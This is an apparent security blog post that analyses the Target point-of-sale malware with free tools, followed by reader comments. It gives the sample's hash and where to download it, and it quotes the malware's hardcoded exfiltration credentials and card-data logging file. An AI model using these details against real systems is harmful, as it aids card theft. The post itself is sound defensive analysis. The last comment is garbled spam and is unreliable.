Helpful Navigation Toolbar

Wednesday, January 29, 2014

Target POS Malware vs. Open Source Tools

The popularity of my last blog post on "how" POS malware functions was honestly a bit of a surprise to me, so I am following it up with another blog post covering the "advanced Target malware" (as I have heard many other "experts" call it) and seeing what information I can pull out of the sample using open source tools. A large portion of my post and research was inspired after reading a very good write-up from Mark Yason, 
which you should definitely read if you have not already done so. After reading his post, I wondered how the comparison of the findings of Mark, and others, compared to the results of freely available tools. In other words, if you do not have much malware reverse engineering experience, exactly how much information can you discover if you have a little bit of time and access to free tools?

The first thing that I did was manage to acquire the malware sample itself (md5sum: ce0296e2d77ec3bb112e270fc260f274), which took quite a bit of digging. Once I finally did find it, I uploaded the sample to VirusShare, where you can download for yourself if you have an account (and if you do not have an account, you should definitely request one). Once that was done I took a look at the file using PeStudio (download) from Marc Ochsenmeier to see what information I could pull out of the malware.

Using PeStudio I was able to determine there were several indicators that the file was malicious, the compile time of "Thu Nov 28 18:08:01 2013", some strings of interest, and even the possible original project path of the malware.

PeStudio initial findings
Possible compile time
A couple strings of interest, including possible project path
From these strings, I had the information that I needed to move onto the next phase, which meant setting up a fake POS environment. For my "fake POS environment" I used a stand-alone Windows XP desktop that I picked up at a second-hand store over Christmas vacation (acquired specifically to be my "Malware Box of Evil") that I put Brian Baskin's Noriben malware sandbox analyzer on. Brian's tool is free (you can donate money to him for adult beverages if you wish).

Brian Baskin's Noriben (background)(download)
 - Requires ActiveState Python (download) and Sysinternals Process Monitor (download)

I created some fake Track1 and Track2 data in a text file. Since the Target malware was specifically targeting the executable "pos.exe", I copied notepad.exe from the C:/Windows folder to the desktop and renamed it "pos.exe" and opened my text file of fake card data by dragging it onto "pos.exe" executable. Although the executable functioned exactly the same as notepad, this method made it appear that "pos.exe" was running and contained Track1 and Track2 data in memory. Once that was done, it was time to use Noriben to see what data I could extract from the system. Having already installed Active State Python, it was simply a matter of running Noriben and waiting to see what the Noriben/Process Monitor combination would reveal. I entered the command to kick off Noriben and once the program told me it was ready, I double-clicked on the malware, which I named "kaptoxa.exe". Surprisingly the malware did not delete itself, "hide" itself from the Windows GUI interface, or anything; it remained sitting on the desktop. (My first definitive indication that this piece of malware was by no means "advanced")

After about a minute I saved the fake card data to two files, foo.txt and foo2.txt, in an effort to try to coax more of the data to be loaded into the fake "pos.exe" process, just in case. Once I was satisfied, I exited Noriben and waited for the results. Not surprisingly, Noriben extracted ALL of the information that I was hoping to see. It confirmed all of the findings that I have seen published on the Target malware to date. Every single piece of it, including the exfiltration commands sending the data to another computer, with the "domain/username password" credentials "ttcopscli3acs\Best1_user BackupU$r" (surely I am not the only one that finds the irony in the most complex string, by far, in the domain-username-password combination is the domain name). I was even able to easily find the "winxml.dll" file in the C:\Windows\System32" folder where the malware stored the Base64 encoded Track1 and Track2 data!

Noriben created processes (note net use, internal IP addresses, paths, domain-username-passwords, and file naming scheme)
Noriben file activity
Noriben registry activity (note POSWDS\Image Path is the full path to where the malware resides)
Noriben network traffic
winxml.dll in C:\Windows\System32 (file logging Base64 encoded Track data)

Contents of "winxml.dll" file (Base 64 encoded Track data)
So there you have it. You can take the Target POS malware and two free tools, which cost a staggering FREE, and gather pretty much all of the information that seasoned malware reverse engineers were able to find while digging through the malware sample. The research that I did on the piece of malware was accomplished in about two hours using these tools, and I am most definitely NOT a malware reverse engineer. I know some RE basics, but anyone could have used these tools and gathered the same results. The freely available tools highlight the hard work put in by tool developers like Brian and Marc that allow us to automate processes and tasks that would have taken us many hours to have performed previously. It also highlights the fact that this piece of malware wasn't particularly advanced by any means, it simply was created with the information needed to target the Target environment specifically (see what I did there?). Cyber criminals will continue to use malware that is only as advanced as it needs to be to allow the compromise, collection, and exfiltration of data. While companies continue to employ weak security practices such as basic username and passwords combinations, the attackers have to make very little, if any, modifications to existing families of malware.


  1. Brian, Great stuff! Since reading your blog posts, PeStudio has been added to my list of tools. Time to setup my own environment for testing!

    1. Thanks Brad! PeStudio is a great tool, Marc has put a lot of work into it and it is great for on-site triage/information gathering of suspected malware.

  2. Excellent post, my friend! Think I might duplicate your work to see it all for myself first hand. Thanks for providing such excellent detail.

    1. Thanks Ken, by all means go for it! The sample is up on VirusShare, so have at it! Just remember to try to have some fake Track1 & Track2 data present in memory for a process called "pos.exe" :)

  3. For those curious is in the range of multicast addresses. It's used by SSDP. I should probably hard code a reference to that IP into Noriben. Sometime in the future :)

    Great write up, Brian. I'm happy that Noriben was able to give you good results on this.

    1. Thanks Brian, Noriben worked great! You don't have to add it to Noriben (unless you want to ;) of course).

      I should have mentioned that in the post. And of course there are plenty resources out there to help you figure out what the IP address(es) are!

      Heck, there is even a Brian Baskin IP to country code script floating around ;)

    2. Great work, great post, still trying too learn more about this things

    3. Thanks! I tried to lay it out in an easy to follow methodology and link to all the tools (and listed where you can find the malware sample) so if anyone has some time they can replicate the environment and findings for themselves!

  4. Very Nice!!

    You have post great information. I am regular reader of blog. Right Now Malware Reverse Engineering is provided better protection technique from virus and real time hacker to protect your personal information.Data security is necessary for everyone.

    Keep up sharing....

  5. Other than the PC running moderate, the machine is assumed control by the noxious programming. These infections mask themselves as hostile to infection application and will begin letting you know that your gadget is contaminated and that you have to tap on the showed catch to acquire an item that will "settle" the issue. types of malwares